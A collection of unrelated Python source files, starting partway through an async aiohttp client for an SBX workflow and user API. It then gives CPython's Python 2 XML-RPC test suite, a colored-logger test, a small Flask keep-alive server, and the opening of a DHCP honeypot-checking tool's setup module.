last = 0.0
while last < len(seq):
out.append(asyncio.gather(*seq[int(last):int(last + avg)]))
last += avg
return out
async def then(self, params):
async with aiohttp.ClientSession() as session:
async with session.get(
self.sbx_workflow.p(self.url), params=params,
headers=self.sbx_workflow.get_headers_json()) as resp:
return await resp.json()
async def find_all(self, params, page_size=1000, max_in_parallel=2):
params['size'] = page_size
params['page'] = 0
queries = []
data = []
temp = await self.then(params)
total_pages = math.ceil(temp['totalCount']/page_size)
for i in range(total_pages):
params_aux = copy.deepcopy(params)
params_aux['page'] = i
queries.append(self.then(params_aux))
if len(queries) > 0:
futures = self.__chunk_it(queries, min(max_in_parallel, len(queries)))
results = await asyncio.gather(*[futures[i] for i in range(len(futures))])
for i in range(len(results)):
for j in range(len(results[i])):
data.append(results[i][j])
else:
data.append(temp)
return data
class SbxWorkflow:
'''
This is the core of the communication with SbxEvent.
The concurrent task operates with asyncio
The request operates with aiohttp
curl --request GET \
--url 'https://sbx-svc-event-test.nubesocobox.com/api/event/129/ibf_delete_box?fromDate=2021-02-28T18%3A30%3A00.000Z&toDate=2021-04-23T14%3A12%3A04.990Z' \
--header 'accept-encoding: gzip, deflate, br' \
--header 'sbx-secret: '
'''
environment = {}
headers = {}
urls = {
'api': '/api/v2/',
'list_process_execution': '/wf/process/execution',
}
def __init__(self, manage_loop=False):
'''
Create a instance of SbxCore.
:param manage_loop: if the event loop is manage by the library
'''
self.loop = None
self.t = None
if manage_loop:
def start_loop():
print('loop started')
self.loop.run_forever()
self.loop = asyncio.new_event_loop()
self.t = Thread(target=start_loop)
self.t.start()
def get_headers_json(self):
self.headers['Content-Type'] = 'application/json'
self.headers['accept-encoding'] = 'gzip, deflate, br'
return self.headers
def p(self, path):
return self.environment['base_url'] + path
def initialize(self, domain, base_url):
self.environment['domain'] = domain
self.environment['base_url'] = base_url
return self
def with_process_execution(self):
return WorkflowQuery(self)
class UserQuery:
def __init__(self, crm_user):
self.crm_user = crm_user
self.url = self.crm_user.urls['api'] + self.crm_user.environment['domain'] + self.crm_user.urls[
'list_users']
def __chunk_it(self, seq, num):
avg = len(seq) / float(num)
out = []
last = 0.0
while last < len(seq):
out.append(asyncio.gather(*seq[int(last):int(last + avg)]))
last += avg
return out
async def then(self, params):
async with aiohttp.ClientSession() as session:
async with session.get(
self.crm_user.p(self.url), params=params,
headers=self.crm_user.get_headers_json()) as resp:
return await resp.json()
async def find_all(self, params, page_size=1000, max_in_parallel=2):
params['size'] = page_size
params['page'] = 0
queries = []
data = []
temp = await self.then(params)
total_pages = math.ceil(temp['totalCount'] / page_size)
for i in range(total_pages):
params_aux = copy.deepcopy(params)
params_aux['page'] = i
queries.append(self.then(params_aux))
if len(queries) > 0:
futures = self.__chunk_it(queries, min(max_in_parallel, len(queries)))
results = await asyncio.gather(*[futures[i] for i in range(len(futures))])
for i in range(len(results)):
for j in range(len(results[i])):
data.append(results[i][j])
else:
data.append(temp)
return data
class SbxCRMUser:
'''
This is the core of the communication with SbxEvent.
The concurrent task operates with asyncio
The request operates with aiohttp
curl --request GET \
--url 'https://sbx-svc-event-test.nubesocobox.com/api/event/129/ibf_delete_box?fromDate=2021-02-28T18%3A30%3A00.000Z&toDate=2021-04-23T14%3A12%3A04.990Z' \
--header 'accept-encoding: gzip, deflate, br' \
--header 'sbx-secret: '
'''
environment = {}
headers = {}
urls = {
'api': '/api/v2/',
'list_users': '/security/auth/users',
}
def __init__(self, manage_loop=False):
'''
Create a instance of SbxCore.
:param manage_loop: if the event loop is manage by the library
'''
self.loop = None
self.t = None
if manage_loop:
def start_loop():
print('loop started')
self.loop.run_forever()
self.loop = asyncio.new_event_loop()
self.t = Thread(target=start_loop)
self.t.start()
def get_headers_json(self):
self.headers['Content-Type'] = 'application/json'
self.headers['accept-encoding'] = 'gzip, deflate, br'
return self.headers
def p(self, path):
return self.environment['base_url'] + path
def initialize(self, domain, base_url):
self.environment['domain'] = domain
self.environment['base_url'] = base_url
return self
def with_process_execution(self):
return UserQuery(self)
|
test_xmlrpc.py
|
import base64
import datetime
import sys
import time
import unittest
import xmlrpclib
import SimpleXMLRPCServer
import threading
import mimetools
import httplib
import socket
import os
from test import test_support
try:
unicode
except NameError:
have_unicode = False
else:
have_unicode = True
alist = [{'astring': 'foo@bar.baz.spam',
'afloat': 7283.43,
'anint': 2**20,
'ashortlong': 2L,
'anotherlist': ['.zyx.41'],
'abase64': xmlrpclib.Binary("my dog has fleas"),
'boolean': xmlrpclib.False,
'unicode': u'\u4000\u6000\u8000',
u'ukey\u4000': 'regular value',
'datetime1': xmlrpclib.DateTime('20050210T11:41:23'),
'datetime2': xmlrpclib.DateTime(
(2005, 02, 10, 11, 41, 23, 0, 1, -1)),
'datetime3': xmlrpclib.DateTime(
datetime.datetime(2005, 02, 10, 11, 41, 23)),
}]
class XMLRPCTestCase(unittest.TestCase):
def test_dump_load(self):
self.assertEquals(alist,
xmlrpclib.loads(xmlrpclib.dumps((alist,)))[0][0])
def test_dump_bare_datetime(self):
# This checks that an unwrapped datetime.date object can be handled
# by the marshalling code. This can't be done via test_dump_load()
# since with use_datetime set to 1 the unmarshaller would create
# datetime objects for the 'datetime[123]' keys as well
dt = datetime.datetime(2005, 02, 10, 11, 41, 23)
s = xmlrpclib.dumps((dt,))
(newdt,), m = xmlrpclib.loads(s, use_datetime=1)
self.assertEquals(newdt, dt)
self.assertEquals(m, None)
(newdt,), m = xmlrpclib.loads(s, use_datetime=0)
self.assertEquals(newdt, xmlrpclib.DateTime('20050210T11:41:23'))
def test_datetime_before_1900(self):
# same as before but with a date before 1900
dt = datetime.datetime(1, 02, 10, 11, 41, 23)
s = xmlrpclib.dumps((dt,))
(newdt,), m = xmlrpclib.loads(s, use_datetime=1)
self.assertEquals(newdt, dt)
self.assertEquals(m, None)
(newdt,), m = xmlrpclib.loads(s, use_datetime=0)
self.assertEquals(newdt, xmlrpclib.DateTime('00010210T11:41:23'))
def test_cmp_datetime_DateTime(self):
now = datetime.datetime.now()
dt = xmlrpclib.DateTime(now.timetuple())
self.assert_(dt == now)
self.assert_(now == dt)
then = now + datetime.timedelta(seconds=4)
self.assert_(then >= dt)
self.assert_(dt < then)
def test_bug_1164912 (self):
d = xmlrpclib.DateTime()
((new_d,), dummy) = xmlrpclib.loads(xmlrpclib.dumps((d,),
methodresponse=True))
self.assert_(isinstance(new_d.value, str))
# Check that the output of dumps() is still an 8-bit string
s = xmlrpclib.dumps((new_d,), methodresponse=True)
self.assert_(isinstance(s, str))
def test_newstyle_class(self):
class T(object):
pass
t = T()
t.x = 100
t.y = "Hello"
((t2,), dummy) = xmlrpclib.loads(xmlrpclib.dumps((t,)))
self.assertEquals(t2, t.__dict__)
def test_dump_big_long(self):
self.assertRaises(OverflowError, xmlrpclib.dumps, (2L**99,))
def test_dump_bad_dict(self):
self.assertRaises(TypeError, xmlrpclib.dumps, ({(1,2,3): 1},))
def test_dump_recursive_seq(self):
l = [1,2,3]
t = [3,4,5,l]
l.append(t)
self.assertRaises(TypeError, xmlrpclib.dumps, (l,))
def test_dump_recursive_dict(self):
d = {'1':1, '2':1}
t = {'3':3, 'd':d}
d['t'] = t
self.assertRaises(TypeError, xmlrpclib.dumps, (d,))
def test_dump_big_int(self):
if sys.maxint > 2L**31-1:
self.assertRaises(OverflowError, xmlrpclib.dumps,
(int(2L**34),))
xmlrpclib.dumps((xmlrpclib.MAXINT, xmlrpclib.MININT))
self.assertRaises(OverflowError, xmlrpclib.dumps, (xmlrpclib.MAXINT+1,))
self.assertRaises(OverflowError, xmlrpclib.dumps, (xmlrpclib.MININT-1,))
def dummy_write(s):
pass
m = xmlrpclib.Marshaller()
m.dump_int(xmlrpclib.MAXINT, dummy_write)
m.dump_int(xmlrpclib.MININT, dummy_write)
self.assertRaises(OverflowError, m.dump_int, xmlrpclib.MAXINT+1, dummy_write)
self.assertRaises(OverflowError, m.dump_int, xmlrpclib.MININT-1, dummy_write)
def test_dump_none(self):
value = alist + [None]
arg1 = (alist + [None],)
strg = xmlrpclib.dumps(arg1, allow_none=True)
self.assertEquals(value,
xmlrpclib.loads(strg)[0][0])
self.assertRaises(TypeError, xmlrpclib.dumps, (arg1,))
def test_default_encoding_issues(self):
# SF bug #1115989: wrong decoding in '_stringify'
utf8 = """<?xml version='1.0' encoding='iso-8859-1'?>
<params>
<param><value>
<string>abc \x95</string>
</value></param>
<param><value>
<struct>
<member>
<name>def \x96</name>
<value><string>ghi \x97</string></value>
</member>
</struct>
</value></param>
</params>
"""
# sys.setdefaultencoding() normally doesn't exist after site.py is
# loaded. reload(sys) is the way to get it back.
old_encoding = sys.getdefaultencoding()
setdefaultencoding_existed = hasattr(sys, "setdefaultencoding")
reload(sys) # ugh!
sys.setdefaultencoding("iso-8859-1")
try:
(s, d), m = xmlrpclib.loads(utf8)
finally:
sys.setdefaultencoding(old_encoding)
if not setdefaultencoding_existed:
del sys.setdefaultencoding
items = d.items()
if have_unicode:
self.assertEquals(s, u"abc \x95")
self.assert_(isinstance(s, unicode))
self.assertEquals(items, [(u"def \x96", u"ghi \x97")])
self.assert_(isinstance(items[0][0], unicode))
self.assert_(isinstance(items[0][1], unicode))
else:
self.assertEquals(s, "abc \xc2\x95")
self.assertEquals(items, [("def \xc2\x96", "ghi \xc2\x97")])
class HelperTestCase(unittest.TestCase):
def test_escape(self):
self.assertEqual(xmlrpclib.escape("a&b"), "a&b")
self.assertEqual(xmlrpclib.escape("a<b"), "a<b")
self.assertEqual(xmlrpclib.escape("a>b"), "a>b")
class FaultTestCase(unittest.TestCase):
def test_repr(self):
f = xmlrpclib.Fault(42, 'Test Fault')
self.assertEqual(repr(f), "<Fault 42: 'Test Fault'>")
self.assertEqual(repr(f), str(f))
def test_dump_fault(self):
f = xmlrpclib.Fault(42, 'Test Fault')
s = xmlrpclib.dumps((f,))
(newf,), m = xmlrpclib.loads(s)
self.assertEquals(newf, {'faultCode': 42, 'faultString': 'Test Fault'})
self.assertEquals(m, None)
s = xmlrpclib.Marshaller().dumps(f)
self.assertRaises(xmlrpclib.Fault, xmlrpclib.loads, s)
class DateTimeTestCase(unittest.TestCase):
def test_default(self):
t = xmlrpclib.DateTime()
def test_time(self):
d = 1181399930.036952
t = xmlrpclib.DateTime(d)
self.assertEqual(str(t), time.strftime("%Y%m%dT%H:%M:%S", time.localtime(d)))
def test_time_tuple(self):
d = (2007,6,9,10,38,50,5,160,0)
t = xmlrpclib.DateTime(d)
self.assertEqual(str(t), '20070609T10:38:50')
def test_time_struct(self):
d = time.localtime(1181399930.036952)
t = xmlrpclib.DateTime(d)
self.assertEqual(str(t), time.strftime("%Y%m%dT%H:%M:%S", d))
def test_datetime_datetime(self):
d = datetime.datetime(2007,1,2,3,4,5)
t = xmlrpclib.DateTime(d)
self.assertEqual(str(t), '20070102T03:04:05')
def test_repr(self):
d = datetime.datetime(2007,1,2,3,4,5)
t = xmlrpclib.DateTime(d)
val ="<DateTime '20070102T03:04:05' at %x>" % id(t)
self.assertEqual(repr(t), val)
def test_decode(self):
d = ' 20070908T07:11:13 '
t1 = xmlrpclib.DateTime()
t1.decode(d)
tref = xmlrpclib.DateTime(datetime.datetime(2007,9,8,7,11,13))
self.assertEqual(t1, tref)
t2 = xmlrpclib._datetime(d)
self.assertEqual(t1, tref)
class BinaryTestCase(unittest.TestCase):
def test_default(self):
t = xmlrpclib.Binary()
self.assertEqual(str(t), '')
def test_string(self):
d = '\x01\x02\x03abc123\xff\xfe'
t = xmlrpclib.Binary(d)
self.assertEqual(str(t), d)
def test_decode(self):
d = '\x01\x02\x03abc123\xff\xfe'
de = base64.encodestring(d)
t1 = xmlrpclib.Binary()
t1.decode(de)
self.assertEqual(str(t1), d)
t2 = xmlrpclib._binary(de)
self.assertEqual(str(t2), d)
PORT = None
# The evt is set twice. First when the server is ready to serve.
# Second when the server has been shutdown. The user must clear
# the event after it has been set the first time to catch the second set.
def http_server(evt, numrequests):
class TestInstanceClass:
def div(self, x, y):
return x // y
def _methodHelp(self, name):
if name == 'div':
return 'This is the div function'
def my_function():
'''This is my function'''
return True
class MyXMLRPCServer(SimpleXMLRPCServer.SimpleXMLRPCServer):
def get_request(self):
# Ensure the socket is always non-blocking. On Linux, socket
# attributes are not inherited like they are on *BSD and Windows.
s, port = self.socket.accept()
s.setblocking(True)
return s, port
try:
serv = MyXMLRPCServer(("localhost", 0),
logRequests=False, bind_and_activate=False)
serv.socket.settimeout(3)
serv.server_bind()
global PORT
PORT = serv.socket.getsockname()[1]
serv.server_activate()
serv.register_introspection_functions()
serv.register_multicall_functions()
serv.register_function(pow)
serv.register_function(lambda x,y: x+y, 'add')
serv.register_function(my_function)
serv.register_instance(TestInstanceClass())
evt.set()
# handle up to 'numrequests' requests
while numrequests > 0:
serv.handle_request()
numrequests -= 1
except socket.timeout:
pass
finally:
serv.socket.close()
PORT = None
evt.set()
# This function prevents errors like:
# <ProtocolError for localhost:57527/RPC2: 500 Internal Server Error>
def is_unavailable_exception(e):
'''Returns True if the given ProtocolError is the product of a server-side
exception caused by the 'temporarily unavailable' response sometimes
given by operations on non-blocking sockets.'''
# sometimes we get a -1 error code and/or empty headers
try:
if e.errcode == -1 or e.headers is None:
return True
exc_mess = e.headers.get('X-exception')
except AttributeError:
# Ignore socket.errors here.
exc_mess = str(e)
if exc_mess and 'temporarily unavailable' in exc_mess.lower():
return True
return False
# NOTE: The tests in SimpleServerTestCase will ignore failures caused by
# "temporarily unavailable" exceptions raised in SimpleXMLRPCServer. This
# condition occurs infrequently on some platforms, frequently on others, and
# is apparently caused by using SimpleXMLRPCServer with a non-blocking socket.
# If the server class is updated at some point in the future to handle this
# situation more gracefully, these tests should be modified appropriately.
class SimpleServerTestCase(unittest.TestCase):
def setUp(self):
# enable traceback reporting
SimpleXMLRPCServer.SimpleXMLRPCServer._send_traceback_header = True
self.evt = threading.Event()
# start server thread to handle requests
serv_args = (self.evt, 1)
threading.Thread(target=http_server, args=serv_args).start()
# wait for the server to be ready
self.evt.wait()
self.evt.clear()
def tearDown(self):
# wait on the server thread to terminate
self.evt.wait()
# disable traceback reporting
SimpleXMLRPCServer.SimpleXMLRPCServer._send_traceback_header = False
def test_simple1(self):
try:
p = xmlrpclib.ServerProxy('http://localhost:%d' % PORT)
self.assertEqual(p.pow(6,8), 6**8)
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
# [ch] The test 404 is causing lots of false alarms.
def XXXtest_404(self):
# send POST with httplib, it should return 404 header and
# 'Not Found' message.
conn = httplib.HTTPConnection('localhost', PORT)
conn.request('POST', '/this-is-not-valid')
response = conn.getresponse()
conn.close()
self.assertEqual(response.status, 404)
self.assertEqual(response.reason, 'Not Found')
def test_introspection1(self):
try:
p = xmlrpclib.ServerProxy('http://localhost:%d' % PORT)
meth = p.system.listMethods()
expected_methods = set(['pow', 'div', 'my_function', 'add',
'system.listMethods', 'system.methodHelp',
'system.methodSignature', 'system.multicall'])
self.assertEqual(set(meth), expected_methods)
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_introspection2(self):
try:
# test _methodHelp()
p = xmlrpclib.ServerProxy('http://localhost:%d' % PORT)
divhelp = p.system.methodHelp('div')
self.assertEqual(divhelp, 'This is the div function')
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_introspection3(self):
try:
# test native doc
p = xmlrpclib.ServerProxy('http://localhost:%d' % PORT)
myfunction = p.system.methodHelp('my_function')
self.assertEqual(myfunction, 'This is my function')
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_introspection4(self):
# the SimpleXMLRPCServer doesn't support signatures, but
# at least check that we can try making the call
try:
p = xmlrpclib.ServerProxy('http://localhost:%d' % PORT)
divsig = p.system.methodSignature('div')
self.assertEqual(divsig, 'signatures not supported')
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_multicall(self):
try:
p = xmlrpclib.ServerProxy('http://localhost:%d' % PORT)
multicall = xmlrpclib.MultiCall(p)
multicall.add(2,3)
multicall.pow(6,8)
multicall.div(127,42)
add_result, pow_result, div_result = multicall()
self.assertEqual(add_result, 2+3)
self.assertEqual(pow_result, 6**8)
self.assertEqual(div_result, 127//42)
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_non_existing_multicall(self):
try:
p = xmlrpclib.ServerProxy('http://localhost:%d' % PORT)
multicall = xmlrpclib.MultiCall(p)
multicall.this_is_not_exists()
result = multicall()
# result.results contains;
# [{'faultCode': 1, 'faultString': '<type \'exceptions.Exception\'>:'
# 'method "this_is_not_exists" is not supported'>}]
self.assertEqual(result.results[0]['faultCode'], 1)
self.assertEqual(result.results[0]['faultString'],
'<type \'exceptions.Exception\'>:method "this_is_not_exists" '
'is not supported')
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_dotted_attribute(self):
# Raises an AttributeError because private methods are not allowed.
self.assertRaises(AttributeError,
SimpleXMLRPCServer.resolve_dotted_attribute, str, '__add')
self.assert_(SimpleXMLRPCServer.resolve_dotted_attribute(str, 'title'))
# Get the test to run faster by sending a request with test_simple1.
# This avoids waiting for the socket timeout.
self.test_simple1()
# This is a contrived way to make a failure occur on the server side
# in order to test the _send_traceback_header flag on the server
class FailingMessageClass(mimetools.Message):
def __getitem__(self, key):
key = key.lower()
if key == 'content-length':
return 'I am broken'
return mimetools.Message.__getitem__(self, key)
class FailingServerTestCase(unittest.TestCase):
def setUp(self):
self.evt = threading.Event()
# start server thread to handle requests
serv_args = (self.evt, 1)
threading.Thread(target=http_server, args=serv_args).start()
# wait for the server to be ready
self.evt.wait()
self.evt.clear()
def tearDown(self):
# wait on the server thread to terminate
self.evt.wait()
# reset flag
SimpleXMLRPCServer.SimpleXMLRPCServer._send_traceback_header = False
# reset message class
SimpleXMLRPCServer.SimpleXMLRPCRequestHandler.MessageClass = mimetools.Message
def test_basic(self):
# check that flag is false by default
flagval = SimpleXMLRPCServer.SimpleXMLRPCServer._send_traceback_header
self.assertEqual(flagval, False)
# enable traceback reporting
SimpleXMLRPCServer.SimpleXMLRPCServer._send_traceback_header = True
# test a call that shouldn't fail just as a smoke test
try:
p = xmlrpclib.ServerProxy('http://localhost:%d' % PORT)
self.assertEqual(p.pow(6,8), 6**8)
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_fail_no_info(self):
# use the broken message class
SimpleXMLRPCServer.SimpleXMLRPCRequestHandler.MessageClass = FailingMessageClass
try:
p = xmlrpclib.ServerProxy('http://localhost:%d' % PORT)
p.pow(6,8)
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e) and hasattr(e, "headers"):
# The two server-side error headers shouldn't be sent back in this case
self.assertTrue(e.headers.get("X-exception") is None)
self.assertTrue(e.headers.get("X-traceback") is None)
else:
self.fail('ProtocolError not raised')
def test_fail_with_info(self):
# use the broken message class
SimpleXMLRPCServer.SimpleXMLRPCRequestHandler.MessageClass = FailingMessageClass
# Check that errors in the server send back exception/traceback
# info when flag is set
SimpleXMLRPCServer.SimpleXMLRPCServer._send_traceback_header = True
try:
p = xmlrpclib.ServerProxy('http://localhost:%d' % PORT)
p.pow(6,8)
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e) and hasattr(e, "headers"):
# We should get error info in the response
expected_err = "invalid literal for int() with base 10: 'I am broken'"
self.assertEqual(e.headers.get("x-exception"), expected_err)
self.assertTrue(e.headers.get("x-traceback") is not None)
else:
self.fail('ProtocolError not raised')
class CGIHandlerTestCase(unittest.TestCase):
def setUp(self):
self.cgi = SimpleXMLRPCServer.CGIXMLRPCRequestHandler()
def tearDown(self):
self.cgi = None
def test_cgi_get(self):
os.environ['REQUEST_METHOD'] = 'GET'
# if the method is GET and no request_text is given, it runs handle_get
# get sysout output
tmp = sys.stdout
sys.stdout = open(test_support.TESTFN, "w")
self.cgi.handle_request()
sys.stdout.close()
sys.stdout = tmp
# parse Status header
handle = open(test_support.TESTFN, "r").read()
status = handle.split()[1]
message = ' '.join(handle.split()[2:4])
self.assertEqual(status, '400')
self.assertEqual(message, 'Bad Request')
os.remove(test_support.TESTFN)
os.environ['REQUEST_METHOD'] = ''
def test_cgi_xmlrpc_response(self):
data = """<?xml version='1.0'?>
<methodCall>
<methodName>test_method</methodName>
<params>
<param>
<value><string>foo</string></value>
</param>
<param>
<value><string>bar</string></value>
</param>
</params>
</methodCall>
"""
open("xmldata.txt", "w").write(data)
tmp1 = sys.stdin
tmp2 = sys.stdout
sys.stdin = open("xmldata.txt", "r")
sys.stdout = open(test_support.TESTFN, "w")
self.cgi.handle_request()
sys.stdin.close()
sys.stdout.close()
sys.stdin = tmp1
sys.stdout = tmp2
# will respond exception, if so, our goal is achieved ;)
handle = open(test_support.TESTFN, "r").read()
# start with 44th char so as not to get http header, we just need only xml
self.assertRaises(xmlrpclib.Fault, xmlrpclib.loads, handle[44:])
os.remove("xmldata.txt")
os.remove(test_support.TESTFN)
def test_main():
xmlrpc_tests = [XMLRPCTestCase, HelperTestCase, DateTimeTestCase,
BinaryTestCase, FaultTestCase]
# The test cases against a SimpleXMLRPCServer raise a socket error
# 10035 (WSAEWOULDBLOCK) in the server thread handle_request call when
# run on Windows. This only happens on the first test to run, but it
# fails every time and so these tests are skipped on win32 platforms.
if sys.platform != 'win32':
xmlrpc_tests.append(SimpleServerTestCase)
xmlrpc_tests.append(FailingServerTestCase)
xmlrpc_tests.append(CGIHandlerTestCase)
test_support.run_unittest(*xmlrpc_tests)
if __name__ == "__main__":
test_main()
|
test_colored_logger.py
|
import io
import logging
import random
import six
import string
import unittest
from friendlylog import colored_logger as logger
from threading import Thread
# Tests cannot be executed in parallel due to the hack in the setUp method.
class TestColoredLogger(unittest.TestCase):
def setUp(self):
# Remove handler that outputs to STDERR.
logger.inner_logger.removeHandler(logger.inner_stream_handler)
# Add handler that outputs to StringIO.
if six.PY2:
self.log_capture = io.BytesIO()
else:
self.log_capture = io.StringIO()
handler = logging.StreamHandler(self.log_capture)
handler.setFormatter(logger.inner_formatter)
logger.inner_logger.addHandler(handler)
logger.setLevel(logging.DEBUG)
def tearDown(self):
pass
def last_line(self):
log = self.log_capture.getvalue().splitlines()
if len(log) == 0:
return []
return log[-1]
def last_n_lines(self, n):
log = self.log_capture.getvalue().splitlines()
return log[-n:]
def num_lines(self):
return len(self.log_capture.getvalue().splitlines())
def test_level_is_logged(self):
logger.debug("message 1")
self.assertIn("DEBUG", self.last_line())
logger.info("message 2")
self.assertIn("INFO", self.last_line())
logger.warning("message 3")
self.assertIn("WARNING", self.last_line())
logger.error("message 4")
self.assertIn("ERROR", self.last_line())
logger.critical("message 5")
self.assertIn("CRITICAL", self.last_line())
def test_function_is_logged(self):
logger.debug("message 1")
self.assertIn(" test_function_is_logged", self.last_line())
logger.info("message 2")
self.assertIn(" test_function_is_logged", self.last_line())
logger.warning("message 3")
self.assertIn(" test_function_is_logged", self.last_line())
logger.error("message 4")
self.assertIn(" test_function_is_logged", self.last_line())
logger.critical("message 5")
self.assertIn(" test_function_is_logged", self.last_line())
def test_filepath_is_logged(self):
logger.debug("message 1")
self.assertIn("test_colored_logger.py", self.last_line())
logger.info("message 2")
self.assertIn("test_colored_logger.py", self.last_line())
logger.warning("message 3")
self.assertIn("test_colored_logger.py", self.last_line())
logger.error("message 4")
self.assertIn("test_colored_logger.py", self.last_line())
logger.critical("message 5")
self.assertIn("test_colored_logger.py", self.last_line())
def test_message_is_logged(self):
logger.debug("message 1")
self.assertIn("message 1", self.last_line())
logger.info("message 2")
self.assertIn("message 2", self.last_line())
logger.warning("message 3")
self.assertIn("message 3", self.last_line())
logger.error("message 4")
self.assertIn("message 4", self.last_line())
logger.critical("message 5")
self.assertIn("message 5", self.last_line())
def test_levels(self):
def log_all():
logger.debug("message 1")
logger.info("message 2")
logger.warning("message 3")
logger.error("message 4")
logger.critical("message 5")
def test_last(expected):
self.assertIsInstance(expected, list)
last_n = self.last_n_lines(len(expected))
self.assertEqual(len(last_n), len(expected))
for output, exp in zip(last_n, expected):
self.assertIn(exp, output)
expected_logs = [
"DEBUG: message 1",
"INFO: message 2",
"WARNING: message 3",
"ERROR: message 4",
"CRITICAL: message 5"
]
# Debug.
logger.setLevel(logging.DEBUG)
log_all()
self.assertEqual(self.num_lines(), 5)
test_last(expected_logs)
# Info.
logger.setLevel(logging.INFO)
log_all()
self.assertEqual(self.num_lines(), 5 + 4)
test_last(expected_logs[1:])
# Warning.
logger.setLevel(logging.WARNING)
log_all()
self.assertEqual(self.num_lines(), 5 + 4 + 3)
test_last(expected_logs[2:])
# Error.
logger.setLevel(logging.ERROR)
log_all()
self.assertEqual(self.num_lines(), 5 + 4 + 3 + 2)
test_last(expected_logs[3:])
# Critical.
logger.setLevel(logging.CRITICAL)
log_all()
self.assertEqual(self.num_lines(), 5 + 4 + 3 + 2 + 1)
test_last(expected_logs[4:])
def test_multi_threaded_is_ok(self):
num_threads = 75
def log_all(msg):
for _ in range(0, 11):
logger.debug(msg)
logger.info(msg)
logger.warning(msg)
logger.error(msg)
logger.critical(msg)
# Generate a random long message for each thread.
messages = []
for _ in range(0, num_threads):
msg = []
length = random.randint(500, 2000)
alphabet = string.punctuation + string.ascii_letters + string.digits # noqa: E501
for i in range(0, length):
msg.append(random.choice(list(alphabet)))
messages.append(''.join(msg))
self.assertNotIn('\n', messages[-1])
self.assertEqual(len(messages), num_threads)
# Create, start and stop threads.
threads = []
for i in range(0, num_threads):
threads.append(Thread(target=log_all, args=(messages[i],)))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
# Check the output.
self.assertEqual(self.num_lines(), num_threads * 11 * 5)
log = self.log_capture.getvalue().splitlines()
for line in log:
self.assertEqual(line[0], '[')
self.assertGreater(len(line), 500)
# Counts in how many elements of @array, @substr can be found.
def count_in(array, substr):
cnt = 0
for el in array:
if substr in el:
cnt += 1
return cnt
for msg in messages:
self.assertEqual(count_in(log, msg), 11 * 5)
for level in ["DEBUG", "INFO", "WARNING", "ERROR", "CRITICAL"]:
self.assertEqual(count_in(log, level + ": " + msg), 11)
def test_terminal_logging(self):
logger.info("message to terminal device")
self.assertIn("INFO", self.last_line())
# 118 (the length without colors) + 4 coloring characters.
self.assertGreaterEqual(len(self.last_line()), 118 + 4)
def test_non_str_logging(self):
logger.info(10)
self.assertIn("10", self.last_line())
# Those should not throw any error.
logger.debug([10, 20, 30])
logger.critical({})
logger.warning(set([-1, 4]))
if __name__ == '__main__':
unittest.main()
|
keep_alive.py
|
from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def home():
return "SERVER IS RUNNING !!"
def run():
app.run(host='0.0.0.0', port=8080)
def keep_alive():
t = Thread(target=run)
t.start()
|
app_preparation.py
|
#!/usr/bin/env python3
from threading import Thread
import importlib
from typing import List
import logging.handlers
import sys
from .modules.base_control import BaseControl, ControlConfiguration
from .dhcp_watchmen import DHCPWatchmen
LOG_LEVEL = logging.DEBUG
logger = logging.getLogger("elchicodepython.honeycheck")
logger.setLevel(LOG_LEVEL)
ch = logging.StreamHandler()
ch.setLevel(LOG_LEVEL)
formatter = logging.Formatter(
fmt="%(asctime)s - %(levelname)s - HoneyCheck %(message)s"
)
ch.setFormatter(formatter)
logger.addHandler(ch)
def get_control_objects(iface_config: dict, control_type: str) -> List[BaseControl]:
control_objects_str = [co.strip() for co in iface_config[control_type].split(",")]
control_objects = []
for control_object_str in control_objects_str:
# Import the control module defined in the configuration
control_object_module_str = ".".join(control_object_str.split('.')[:-1])
control_object_class_str = control_object_str.split('.')[-1]
try:
control_object_module = importlib.import_module(
control_object_module_str
)
except ModuleNotFoundError:
logger.error(f"Module {control_object_module_str} not found")
continue
ControlClass = getattr(
control_object_module,
control_object_class_str
)
control_object = ControlClass() # Instance of the Control Object
control_configuration = ControlConfiguration(iface_config, control_type)
control_object.set_conf(control_configuration)
control_object_requirements = control_object.get_conf_req()
if control_object_requirements.check_dependencies(control_configuration):
if control_object_requirements.check_requirements(control_configuration):
control_objects.append(control_object)
else:
logger.critical(
"Requirements "
+ str(control_object_requirements.config_requirements)
+ " check failed in "
+ control_object_str
)
return []
else:
logger.critical(
"Dependencies check failed in module "
+ control_object_str
)
return []
return control_objects
def start_the_party(config: dict, config_file: str):
# If HoneyCHECK is not configured exit
if len(config.sections()) == 0:
logger.error(
"You should provide a valid configuration to honeycheck before using it\n"
"Read the docs at https://github.com/elchicodepython/HoneyCheck"
)
